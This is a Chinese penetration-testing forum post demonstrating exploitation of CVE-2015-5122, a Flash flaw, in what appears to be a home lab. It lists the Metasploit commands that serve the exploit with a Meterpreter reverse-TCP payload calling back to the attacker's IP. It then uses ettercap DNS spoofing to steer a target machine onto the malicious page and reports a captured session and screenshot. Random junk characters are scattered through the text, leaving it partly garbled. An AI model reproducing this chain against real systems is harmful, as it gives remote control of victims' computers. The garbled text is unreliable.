中国网络渗透测试联盟

标题: cve2015-5122漏洞实例演示虚拟机 [打印本页]

作者: admin    时间: 2018-10-20 20:28
标题: cve2015-5122漏洞实例演示虚拟机

0 I) b. ], ^- l' _0 X+ D 二、cve2015-5122漏洞实例演示虚拟机 ' w! |$ j, ^+ f! w( g) I$ K$ x& d

' h3 ?9 K: d, w5 i6 h8 K/ w" m1 h

/ z1 R5 @- \1 }' ]% O0 C9 z$ m   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: w/ W! z3 i- T* ?! e0 E! U

! H% U \4 J t' @1 f" j

8 }7 {* q7 _ e a7 Y1 m search cve-2015-5122如图: 2 H* J8 O+ b' ]& u" J! D

# V) n8 P* y9 `4 F+ F

1 Z8 X5 i7 s; [3 ^: S& L   3 T6 {9 [- F' Z( x0 C! c) H: ]

/ J. \* `+ a* m @ O" D7 {& F. m

0 g) {. |4 V! U 下面我们敲如下命令: " t& x0 R" u- _. J# o! K

5 X, G; o3 F3 q+ W9 l a) Q+ D

6 ~/ r, i& Z/ \( H" ^. J use exploit/multi/browser/adobe_flash_opaque_background_uaf S" B5 y* \$ L% T

% y% ~6 j- b* o* \. q# B

7 T Y3 w7 ]/ W A; e& q' h0 R set PAYLOAD windows/meterpreter/reverse_tcp 5 Z# E/ V5 [# k( s

$ G' A0 _: ^7 z% k+ k2 @: i0 `: L

3 Z8 W3 ~: i+ u set LHOST 192.168.0.109 & ]/ ?: k9 q3 L

+ {" h {, ^9 J7 f+ b" q

8 F2 E* X- P- ?3 K8 e8 O set URIPATH /                        /*根目录*/ & e8 J& m, G4 _, a; Y4 f# M8 ^0 G

% r, e) o' l$ }

6 G! z! I) F! p! t7 a set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 ! B$ f1 v7 v: g5 U8 I

+ Y7 R8 k* l+ c' Z3 ?5 C/ J0 D

8 k% u; s, U) q& O set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ! g2 ^8 ?0 H2 {/ w* h

8 J; G, h* r8 N7 [1 ]

+ j5 _9 q) E5 g 然后show options如图: & p X3 ]' i$ k! k- A1 J

, \, Y" l# K1 n8 n3 v

& @- q0 K$ T' R6 z$ y   ' ?: a" s3 |" G6 r( ^- k: q! b2 P/ A7 X

( b6 o8 c5 e. R, v

) F, T5 T9 Y4 c# x: ~ 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
) m8 y6 Y' k$ A
/ K$ g; [8 P" I8 s0 t3 ]

& ?6 n0 T4 Z# x9 n& G

: R7 e2 u* O3 F9 _ 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 % u1 `1 _! _8 h- e7 n; ~* v

' G6 M7 e9 U1 m( W

4 x/ y. |8 ?4 I Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf & {7 ]" j4 Z, s! e1 A4 w# \7 v- k

7 }' \- [& j9 H7 V0 O, j

; P) x. l% u0 {! E: c   ( t1 w9 N# {6 q" R

& j5 E: o+ p! z0 x: V2 t# r5 F5 a( y

" L8 N! o1 p. w0 W 成功了,这时候我们断开ettercap,如图: 9 b# K H4 g4 v' R

7 z& n p6 _( u4 K! w

. ?5 h5 e% ^3 q/ @) x }+ i; O   7 D* Y. W- n: T( e8 ?

0 }7 o4 f& T$ u

: b) A) S& F# ?3 F9 \' k/ w Screenshot如图: 4 L; R2 z; }; H- g- [

2 k- f k7 H! |8 u( g, U3 A

* {6 `- w5 U" [. V/ p" e   7 E) u4 `; y' j1 S" ]0 l( o& U

* i4 p- M' F; u& g2 d& O' A; `2 U

6 t; O" E* b/ Z6 L) O ) S& n. j2 }$ A! n+ q. R( N* f






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2